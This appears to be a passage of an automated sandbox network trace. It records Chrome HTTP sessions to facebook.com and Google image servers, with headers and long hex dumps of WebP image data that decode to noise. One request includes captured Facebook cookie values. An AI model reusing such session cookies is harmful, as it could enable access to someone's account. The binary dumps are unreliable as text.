                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://www.facebook.com/?locale=ru_RU
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; wd=1280x907; datr=d934ZsjiAffZHUJjG80fHvH1
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC551OUTData Raw: 6c 6f 63 61 6c 5f 73 74 6f 72 61 67 65 5b 53 65 73 73 69 6f 6e 5d 3d 32 30 26 6c 6f 63 61 6c 5f 73 74 6f 72 61 67 65 5b 68 62 5f 74 69 6d 65 73 74 61 6d 70 5d 3d 31 33 26 6c 6f 63 61 6c 5f 73 74 6f 72 61 67 65 5b 73 69 67 6e 61 6c 5f 66 6c 75 73 68 5f 74 69 6d 65 73 74 61 6d 70 5d 3d 31 33 26 73 65 73 73 69 6f 6e 5f 73 74 6f 72 61 67 65 5b 54 61 62 49 64 5d 3d 36 26 73 65 73 73 69 6f 6e 5f 73 74 6f 72 61 67 65 5b 73 70 5f 70 69 5d 3d 32 32 32 26 6c 6f 67 74 69 6d 65 3d 30 26 5f 5f 75 73 65 72 3d 30 26 5f 5f 61 3d 31 26 5f 5f 72 65 71 3d 35 26 5f 5f 68 73 3d 31 39 39 39 35 2e 42 50 25 33 41 44 45 46 41 55 4c 54 2e 32 2e 30 2e 2e 30 2e 30 26 64 70 72 3d 31 26 5f 5f 63 63 67 3d 47 4f 4f 44 26 5f 5f 72 65 76 3d 31 30 31 36 39 30 30 35 35 31 26 5f 5f 73 3d 66
                                                                                                                                                                                                                                Data Ascii: local_storage[Session]=20&local_storage[hb_timestamp]=13&local_storage[signal_flush_timestamp]=13&session_storage[TabId]=6&session_storage[sp_pi]=222&logtime=0&__user=0&__a=1&__req=5&__hs=19995.BP%3ADEFAULT.2.0..0.0&dpr=1&__ccg=GOOD&__rev=1016900551&__s=f
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC1631INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7419924018947410008", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(self), clipboard-write=(self), compute-pressure=(), display-capture=(self), encrypted-media=(self), fullscreen=(self), gamepad=*, geolocation=(self), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(self), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(self), private-state-token-issuance=(), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=(self);report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                cross-origin-opener-policy: same-origin-allow-popups;report-to="coop_report"
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC1125INData Raw: 72 65 70 6f 72 74 2d 74 6f 3a 20 7b 22 6d 61 78 5f 61 67 65 22 3a 32 35 39 32 30 30 30 2c 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 62 72 6f 77 73 65 72 5f 72 65 70 6f 72 74 69 6e 67 5c 2f 63 6f 6f 70 5c 2f 3f 6d 69 6e 69 6d 69 7a 65 3d 30 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 6f 6f 70 5f 72 65 70 6f 72 74 22 2c 22 69 6e 63 6c 75 64 65 5f 73 75 62 64 6f 6d 61 69 6e 73 22 3a 74 72 75 65 7d 2c 20 7b 22 6d 61 78 5f 61 67 65 22 3a 32 35 39 32 30 30 2c 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 61 6a 61 78 5c 2f 62 72 6f 77 73 65 72 5f 65 72 72 6f 72
                                                                                                                                                                                                                                Data Ascii: report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC80INData Raw: 34 35 0d 0a 66 6f 72 20 28 3b 3b 29 3b 7b 22 5f 5f 61 72 22 3a 31 2c 22 70 61 79 6c 6f 61 64 22 3a 7b 22 6b 65 79 73 22 3a 5b 5d 7d 2c 22 6c 69 64 22 3a 22 37 34 31 39 39 32 34 30 31 38 39 34 37 34 31 30 30 30 38 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 45for (;;);{"__ar":1,"payload":{"keys":[]},"lid":"7419924018947410008"}0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                123192.168.2.450023216.58.206.864432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC530OUTGET /K6kGejYk6GTdg5AenV4A0e-Nc48xjZ_-Qj50IUO5pUCf0V6EpJbeOku4Rk73atcPD4A=w416-h235-rw HTTP/1.1
                                                                                                                                                                                                                                Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC531INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Server: fife
                                                                                                                                                                                                                                Content-Length: 75826
                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:45 GMT
                                                                                                                                                                                                                                Expires: Mon, 30 Sep 2024 04:54:45 GMT
                                                                                                                                                                                                                                Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                ETag: "v1"
                                                                                                                                                                                                                                Content-Type: image/webp
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                Age: 0
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC859INData Raw: 52 49 46 46 2a 28 01 00 57 45 42 50 56 50 38 4c 1e 28 01 00 2f 9f 81 32 00 4d 48 0c c0 36 6c 9b 00 14 08 49 90 fe 3f d8 ea f6 42 44 ff 27 40 6a 03 08 9e 7e 26 92 9f dd 66 77 af 19 c7 00 6d 7b 59 c2 df 04 b0 3e d4 1f bc 3d 04 40 01 ed 82 1d db 56 f2 09 f8 e0 08 2a f2 2b f8 ee 3a 01 86 3d fc 4e f8 06 2c 20 00 ee bd 49 02 5c 9f 7b ef ed aa fc 38 48 ce 84 d3 0e 99 24 64 0e 0f f8 3b 49 c2 9c cf 39 07 b8 48 55 92 41 60 42 9e 73 86 ef ed 24 bf fc 23 92 5c a0 26 40 f2 47 92 b0 65 7b bb c8 84 e4 6c 40 49 80 00 37 01 8c 83 78 c6 97 40 71 2d 70 f9 39 98 e7 b2 a5 9c 93 2c e3 ef 93 7b c9 90 7d aa 0c 7f e7 34 09 db 96 f4 b8 1f 63 5a b2 c9 00 f3 9c 93 40 28 60 d8 fa ec bd ed ee d9 2d f1 9e 5b 09 80 79 4e f2 40 2f 60 4c 2f 9e 31 28 79 62 3e b6 6d 7d ee 2a c7 f1 6d 20 24
                                                                                                                                                                                                                                Data Ascii: RIFF*(WEBPVP8L(/2MH6lI?BD'@j~&fwm{Y>=@V*+:=N, I\{8H$d;I9HUA`Bs$#\&@Ge{l@I7x@q-p9,{}4cZ@(`-[yN@/`L/1(yb>m}*m $
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC1390INData Raw: 8d 9c 3b f7 22 84 4a e5 1b 94 f8 1a 4c df 4d 6d c5 76 cd 11 47 d3 11 97 57 c0 33 3c 1b f8 62 78 de 2c 8d 13 db f3 f5 f1 7c bb e3 ff a3 fd 14 b9 bd 76 bb d2 24 4e f5 a2 01 a2 e6 85 39 7a 74 41 0a 54 8d 1a 15 14 a0 34 7c c3 50 a3 26 75 9b d9 fa 74 e8 9c 70 8d 67 0b cf 76 fc cc b5 e6 62 e5 31 fb cb 3f 87 ab 1f cb bc 2c e3 9b eb 2d f5 a8 02 f4 1d 8f 9a d7 d6 5b d6 4f cd a6 0a 78 a1 26 2e 53 8f 07 89 28 00 08 00 8a a9 4a e0 f5 01 a1 41 32 25 da 05 c6 c3 54 0f 5d 78 80 e3 f5 66 b4 76 51 2b 11 8a 71 de 94 68 c1 a1 bf 34 3b ca dd 28 98 af 54 6b a3 99 7c 77 88 8b 5e 94 65 01 60 53 14 c5 99 ba b6 87 75 61 1d ae 54 54 3d 40 10 c4 c9 f0 b2 b6 32 34 8b ef 22 7c c6 f9 17 bf 7d d8 56 a3 fd 37 bd b2 dd 5f 67 94 f4 a8 58 9e 10 c4 1c e7 2e 0c eb 05 f9 b9 af ef 58 06 8b be
                                                                                                                                                                                                                                Data Ascii: ;"JLMmvGW3<bx,|v$N9ztAT4|P&utpgvb1?,-[Ox&.S(JA2%T]xfvQ+qh4;(Tk|w^e`SuaTT=@24"|}V7_gX.X
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC1390INData Raw: a1 55 97 af 97 97 f3 ec 3a bb ca a9 6f 3a a6 7b 81 16 94 45 3c f0 c6 6d a9 6b ab d4 6d dd ed 8a 97 b7 6d 4d b7 b9 35 57 db 8a aa 1d 80 17 9f a6 9b db 9c 5b 35 6f d4 20 e5 fb 74 f3 78 d6 b9 f5 38 41 05 bf a8 73 53 9d 8a ea e6 00 ca 97 0f 3e 36 bf 4e a9 55 82 a8 80 20 4c 38 d6 be e8 7e 5d a7 8a e0 01 a6 8a b9 db 5e e4 8b 12 20 36 a1 36 b3 56 6b be ce 1e aa 0e a0 b2 eb 7a 7e e5 83 5d 45 c0 42 2a 87 ec d3 50 0e 0e 12 90 2d e7 30 cf 5a 7b e5 44 10 3a 6f e6 ff 79 a1 02 3e ef 1f 82 27 8f 2a c7 fc 1f 57 ae d9 ff bf b6 6d c9 99 73 df 5b a6 7d cb 7b ef 3d 94 a8 45 dd 5c 82 82 cd e4 bd 98 f7 5e c2 de 7b ef bd f7 de 7b af f2 de 57 ad 01 e6 da fb 76 9d 08 3e 54 e1 78 a9 b8 e0 a5 7f f8 c3 23 85 af a8 12 e8 38 9a 4e 7a f1 82 93 fe f0 48 61 cb c5 d1 79 0c a6 67 d0 4d 2f
                                                                                                                                                                                                                                Data Ascii: U:o:{E<mkmmM5W[5o tx8AsS>6NU L8~]^ 66Vkz~]EB*P-0Z{D:oy>'*Wms[}{=E\^{{Wv>Tx#8NzHaygM/
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC1390INData Raw: f5 3e e6 da fb dc af d0 5a 5a ca 27 b0 3f b6 ae 04 16 2e 16 58 50 02 8d fb 0b 40 39 f0 b1 b4 a9 b5 86 73 ce 5e 73 f6 1e 13 20 27 db b6 c5 72 c2 cc cc 9c 8a a1 62 e6 8a b1 62 66 66 66 66 66 66 66 a6 8a 99 99 99 99 e9 9f ff 9b b3 47 c1 eb 63 54 8c a0 a0 a7 68 88 8d b5 10 9a 2e 22 8e 8a 5c 51 16 09 71 10 23 11 c1 06 d8 c3 76 a3 21 a6 a2 2f 65 fa 44 45 ca d8 88 84 75 93 6e 8d 44 c4 18 89 88 71 15 31 6b e4 18 48 b7 06 82 dd 71 11 11 13 f0 e3 9e 3c 82 7d ed 72 27 bb 0a 20 87 8c 22 97 52 4a 82 ef 8c 5d b0 a7 81 bc 41 69 cf 80 fa 0e 07 58 46 20 55 54 23 15 80 23 04 e5 0c a5 26 95 06 39 69 b1 bd 96 68 2c 08 53 df e9 71 a8 2c 00 8a ab 2c 4e 02 c4 ea 1a 26 23 90 94 2e 41 d4 9c a6 e6 4d cb 89 68 6a b9 c4 55 a9 60 3c 66 0a f0 c4 e5 02 70 d3 97 09 08 ac a5 e6 65 65 72
                                                                                                                                                                                                                                Data Ascii: >ZZ'?.XP@9s^s 'rbbfffffffGcTh."\Qq#v!/eDEunDq1kHq<}r' "RJ]AiXF UT##&9ih,Sq,,N&#.AMhjU`<fpeer
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC1390INData Raw: cf 10 1e 0d 47 59 f3 51 32 0c a6 1a 96 e1 00 ab b0 b4 43 45 e8 c0 c1 58 68 cb e9 4a 19 8a b4 6c ba ea 87 1c 66 2b f3 13 5e 34 50 ca 96 0f f5 a2 da a6 3c 15 cd ca 21 59 33 9b 28 c1 49 1c 74 d7 a0 83 6f d4 10 a8 84 68 dc 6d 57 1c 1b 4d 45 d6 6a a3 d1 3c 92 de 0f 95 c0 ec 60 08 3a c9 ed 61 19 32 04 0b 7a 06 3b f3 3d 8c 3d ee ce ee d2 35 d4 5a ab 1f 1c 5e a7 d3 1b e0 dd 37 57 50 d3 74 57 18 08 a0 cc 34 63 d1 35 d0 00 4a 1b af 99 bb 1f 5c 7f 6c ca cc c7 d6 72 6f ee 9e 07 ee ee f8 8c bb b8 e6 5a 0f f0 36 41 09 65 0f 02 22 4f 5c 49 ef d9 5f 10 40 0b c8 f8 bd 78 7f 58 eb 99 2f 9b 8d 27 4e a6 0b af 97 50 57 06 c0 9b 54 43 21 28 37 15 e0 a6 44 02 68 df 82 d5 49 e6 38 11 02 38 b6 38 37 cd 07 a5 46 00 89 af 68 aa 4e 84 39 27 f0 6b 01 dc 80 79 30 00 74 43 ab 70 67 c9
                                                                                                                                                                                                                                Data Ascii: GYQ2CEXhJlf+^4P<!Y3(ItohmWMEj<`:a2z;==5Z^7WPtW4c5J\lroZ6Ae"O\I_@xX/'NPWTC!(7DhI8887FhN9'ky0tCpg
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC1390INData Raw: 79 32 62 24 14 d9 6a 00 25 b0 56 4a 2a 83 d7 f7 17 ce cb 14 16 a9 5f 32 c5 18 03 01 cb 57 ee f3 69 8e f0 e0 ee 4c 69 1c da ba 39 53 9b d3 da 0a 83 d4 1c 66 f4 a6 ba 72 6d cf 36 18 00 dc 3c 3c f0 54 ed a5 f7 e8 c1 d3 36 1a 8d 56 46 f4 c9 72 0d 02 f6 9d 7e de b1 7f ae ed 09 90 47 26 12 c2 7b ef 80 1f f0 ac 09 4e d9 9a 58 9a 88 48 6f de 08 e5 c8 29 8d 40 7a 80 34 ca eb 73 7d e4 d7 b8 ac 8e 40 75 a6 01 4e 4b 14 98 af a8 8b 32 b0 02 e8 0d 93 4d 3c bd 04 70 9f ee ab 35 5b b9 02 5b a1 6d 00 51 a2 cd ac 09 74 4a a5 80 c9 0c a8 29 27 ed b8 63 a0 a7 fb f9 c4 06 ad 84 33 65 10 9b 44 1e 35 40 08 8f 1d 44 23 e4 d4 47 d4 4a 11 42 b1 01 f1 68 1d 33 a8 8b 6e 49 d1 10 17 62 ec d4 4b 8f 2c df 3f 28 f3 63 d2 a6 58 c9 8e 39 92 bf ee 78 79 bf d1 0d 3d f7 c2 a8 e7 48 7a 73 93
                                                                                                                                                                                                                                Data Ascii: y2b$j%VJ*_2WiLi9Sfrm6<<T6VFr~G&{NXHo)@z4s}@uNK2M<p5[[mQtJ)'c3eD5@D#GJBh3nIbK,?(cX9xy=Hzs
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC1390INData Raw: 86 1b 59 b3 d9 6c 1e 19 36 23 2b 24 27 b2 71 d9 0d 17 fc 30 4b f4 db c5 6a d3 3a 47 e4 aa 30 36 a9 b3 a4 c3 cc cd 37 98 37 96 f2 50 41 d3 35 13 82 a4 df 5c 08 33 39 09 7b 0e a2 58 0c d6 d7 b3 31 e4 a0 0e d4 8b 3e 48 f9 41 c9 a5 c9 9d 16 76 56 fa 7c b3 d5 a5 cb 4a 5d 42 45 60 72 0f 1f c4 77 f8 e0 0f 07 6a 1d 58 bb 38 06 34 79 7b 55 a8 af cc 6f 60 7e fd f3 fc c1 99 5f 74 f1 0b c2 2f 31 fe 9c f8 23 e1 0b 05 b8 2a 8f 87 6b e0 1d d0 77 08 ef 54 be 42 f8 fb e9 eb e9 68 10 bc e2 b0 b3 f4 c9 93 3c 31 41 d4 69 82 e3 04 3e 05 e2 d2 16 52 01 31 c0 96 59 38 47 81 a0 05 04 a9 74 82 5c c8 89 58 44 14 22 03 9c 11 86 4c 23 40 00 69 ff ab fe f1 fe ed ff f7 2c 9a 2d 3d e4 dd 73 11 14 b5 af da 8b db 32 94 67 ad 8b 13 5f 78 fb da fa 3e 1a 7e 05 4b 79 ee bd c5 6e f8 ae fb 9f
                                                                                                                                                                                                                                Data Ascii: Yl6#+$'q0Kj:G0677PA5\39{X1>HAvV|J]BE`rwjX84y{Uo`~_t/1#*kwTBh<1Ai>R1Y8Gt\XD"L#@i,-=s2g_x>~Kyn
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC1390INData Raw: b0 11 a8 8a 04 8a 07 c7 d8 62 d1 2d 3b 63 8b b6 53 e6 b7 ea 8f c4 fd 6c d1 46 e4 25 73 61 30 93 62 8e 8c 55 f7 08 68 3d ba 5e 13 70 f7 5e e3 f0 89 c4 b9 f9 f3 71 1f 6d f4 e8 1d 8f 7c a6 f1 a1 22 97 c2 05 26 3a 5a b2 9a 10 c8 26 93 c9 ab bf e8 4d 2b 26 45 02 ba d4 7c 91 77 78 2b 47 42 46 b9 81 07 73 33 de 7f b8 db 8d ce 43 bd 4d b7 dd 34 e2 59 db 1e 0a 81 5c 0f 42 f8 e8 86 d1 2a f4 7c 57 55 69 4c 69 ac ce 19 e6 18 e1 cb c2 0b 43 df f3 31 14 29 e6 a0 3f f6 40 22 14 39 f7 0c ee 91 36 5b 90 b2 e7 4c 6b 40 e7 5a 4a 4a 22 64 f8 08 97 16 2f d7 d3 04 67 31 ca bb 6e 92 0c f6 9a be 18 28 18 d4 3d 23 d4 d4 b0 60 b2 8d 41 69 97 f3 65 2c de ea a8 d1 a8 1f 46 7a 96 c6 41 69 16 8b c5 48 c0 9a 6e 7b 71 ab c5 50 e7 7a b8 42 d7 11 d7 5b bc 9f 3d b9 bc f8 40 67 3d 9d e8 71
                                                                                                                                                                                                                                Data Ascii: b-;cSlF%sa0bUh=^p^qm|"&:Z&M+&E|wx+GBFs3CM4Y\B*|WUiLiC1)?@"96[Lk@ZJJ"d/g1n(=#`Aie,FzAiHn{qPzB[=@g=q
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC1390INData Raw: 51 5a 81 a4 8d a5 fb 02 46 4d 88 5a 65 5e 34 b3 65 30 cd e5 c3 73 73 c6 76 33 55 51 e5 d2 b8 e9 4c 69 5f 53 f5 40 a5 83 bc f9 59 57 3f 44 34 6c 5e 14 db b4 39 df 5a 6c 97 1a af e0 aa 38 0a 97 8a 03 3c b8 a8 8b dd f4 70 fb 54 26 1a 09 75 97 2f 6c 4a 7c eb ad e2 54 9d 9e 8c a1 77 85 0f 8b 2d 41 75 63 23 ac 51 f5 4f 0e dc f8 3f bb ab 61 22 86 d1 25 a0 ba b2 8c 2c 9c 97 c3 6a 4a 5b 78 ce 77 d5 f4 86 6f 9f 97 be f3 fe eb 27 a6 fe 6e 5b 02 8f 9f 0f 7f f7 f4 65 f0 4e f9 cd cb 6f d2 3a b2 05 67 0e 77 42 74 68 e0 e0 23 6a a7 33 9c 71 fa f9 81 b6 8c e7 ce be 3c 51 75 40 9f 73 f4 31 ca 58 9c c3 37 08 01 04 4c ac ec c8 58 69 8d ab 6a 4e 48 de 61 a9 ef 53 6a aa db 11 48 eb 2a 63 31 58 a2 1e 93 ef 9f 7b b2 28 31 c7 74 d1 da 09 88 1d 13 de 40 a6 cd 56 11 2e 37 8b fd e1
                                                                                                                                                                                                                                Data Ascii: QZFMZe^4e0ssv3UQLi_S@YW?D4l^9Zl8<pT&u/lJ|Tw-Auc#QO?a"%,jJ[xwo'n[eNo:gwBth#j3q<Qu@s1X7LXijNHaSjH*c1X{(1t@V.7
                                                                                                                                                                                                                                2024-09-29 04:54:45 UTC1390INData Raw: af c0 e2 dc 0f 04 cd 19 9c f2 19 4e e1 36 30 36 2f 99 5a 60 4b 82 44 a4 9b 15 8b fb f3 43 05 cb cf 3c 27 aa ff 0e 1e c6 2a 96 f1 10 5c 84 f1 11 3a b2 d6 37 1c af 29 43 c7 87 40 d6 22 8a ca 0e 90 03 f3 3a c5 03 4a 7b 5e 9f fc 8c 0b 1a dc b0 3f 3d cb e3 e7 91 99 27 f7 ad a2 b5 87 c7 2a 70 26 f1 e3 35 cc 48 c0 33 1b 3e 5d f1 5b f8 1a 20 81 42 b8 47 12 88 41 38 10 ce 41 69 fe 9d ed 64 4f 55 92 8c c7 d1 9e 36 24 f7 54 5d c0 3e c7 32 66 f9 cd 2c 19 17 33 77 b2 b5 da cb 5b 49 19 c6 75 59 46 5e 3f 54 f4 dd 10 e5 55 bb 50 85 37 0c 06 8c ee b5 d6 0e 79 0e 60 72 b6 07 61 93 07 93 9f 48 81 2e 73 88 89 92 6e a9 33 be 48 5b 74 e0 50 b5 c7 12 94 81 ae 0a 55 28 41 16 fc 90 90 a4 34 27 0f d9 b2 18 02 62 90 56 a9 50 b4 f4 95 bd 64 9a 40 4e 28 86 11 29 6f 4b e9 cc 6e 46 82
                                                                                                                                                                                                                                Data Ascii: N606/Z`KDC<'*\:7)C@":J{^?='*p&5H3>][ BGA8AidOU6$T]>2f,3w[IuYF^?TUP7y`raH.sn3H[tPU(A4'bVPd@N()oKnF


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                124192.168.2.450034216.58.206.864432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC524OUTGET /VRMWkE5p3CkWhJs6nv-9ZsLAs1QOg5ob1_3qg-rckwYW7yp1fMrYZqnEFpk0IoVP4LM=s64-rw HTTP/1.1
                                                                                                                                                                                                                                Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC532INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Server: fife
                                                                                                                                                                                                                                Content-Length: 3814
                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:41:45 GMT
                                                                                                                                                                                                                                Expires: Mon, 30 Sep 2024 04:41:45 GMT
                                                                                                                                                                                                                                Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                Age: 781
                                                                                                                                                                                                                                ETag: "v1"
                                                                                                                                                                                                                                Content-Type: image/webp
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC858INData Raw: 52 49 46 46 de 0e 00 00 57 45 42 50 56 50 38 4c d2 0e 00 00 2f 3f c0 0f 00 09 33 6d db 28 5d bf 85 3f e1 69 1c 22 fa 3f 01 f8 0e 40 75 15 12 d7 69 ce d6 44 03 18 2d c2 a8 78 17 8c 22 49 52 94 bb 7b 4f 66 06 ff 36 49 83 9a 48 92 a2 be 03 11 f8 57 85 84 0b 89 df 52 d0 b6 0d e3 1d fe 58 87 60 ed 7f 72 78 14 80 f1 0b c8 a6 7c 00 5c ec 48 4d b9 d5 0b 80 9d 96 56 da 9e b9 03 70 03 b2 82 87 00 7b 01 c0 e3 df 18 0a da b6 61 1c fe b0 77 30 44 c4 04 b8 8b 22 7d bd 34 b5 5b 8b 76 2b 49 92 24 e7 45 cd 62 f8 7b 4b 41 45 a8 38 15 20 f8 4d 09 a8 c0 1e 9d 01 74 47 b5 0c 1e 12 db 48 72 24 89 51 33 77 af cd 7d eb 55 4a 88 24 c9 91 24 cf 39 ae cf fb 49 a8 11 1d e1 c0 6d db 48 4a cf 1c db 3a a9 07 d8 37 f8 da b6 cd 8c b6 6d db 96 ad 92 74 ba 77 9c b6 6d db b6 ad 31 5e b6 6d
                                                                                                                                                                                                                                Data Ascii: RIFFWEBPVP8L/?3m(]?i"?@uiD-x"IR{Of6IHWRX`rx|\HMVp{aw0D"}4[v+I$Eb{KAE8 MtGHr$Q3w}UJ$$9ImHJ:7mtwm1^m
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC1390INData Raw: 2d ca 06 0c a9 4d 50 f6 61 35 5b 1a 6a c5 0e 53 ec 3a 03 78 87 16 40 2d 0d e1 84 7e 48 2c 20 30 f8 01 06 46 02 2e b8 f9 f2 62 3a 00 c9 50 c6 d6 9c 70 7f 9a 37 df 0d 57 66 65 c4 bc 7c 1c 3e 0e bd 84 25 93 65 19 fe da f1 9b f7 bc a3 f7 7c 03 90 a6 f8 bc 05 e8 d1 32 70 06 18 3f 8c 49 9e ca 9a 7f ac 08 40 86 09 7f ce 1f 93 4f be e9 b9 33 57 a2 1c 11 01 69 79 39 7c 84 21 c3 05 04 07 70 64 84 3b 27 4f e2 46 40 05 d6 56 40 83 6e dc cb 08 7e 31 af 25 e0 2d af f8 5d 51 3a e0 f1 b7 e9 1f 57 e2 4a 5c 99 ca 08 88 48 91 68 47 4c 70 9f b2 94 1f ce 52 20 00 88 29 5e b5 9e cd 08 43 88 c5 4f e3 93 8c 21 fe c6 5f 08 07 a0 32 76 cf 3f 33 ff b8 a2 30 ca 40 04 a0 85 1d 61 0b 40 7c d5 fc f6 a2 d3 fc 35 e5 ed f5 39 b4 91 9e 7d 3d 51 8e 01 85 f0 86 e7 5c 34 7d f9 a1 8f cf e7 87
                                                                                                                                                                                                                                Data Ascii: -MPa5[jS:x@-~H, 0F.b:Pp7Wfe|>%e|2p?I@O3Wiy9|!pd;'OF@V@n~1%-]Q:WJ\HhGLpR )^CO!_2v?30@a@|59}=Q\4}
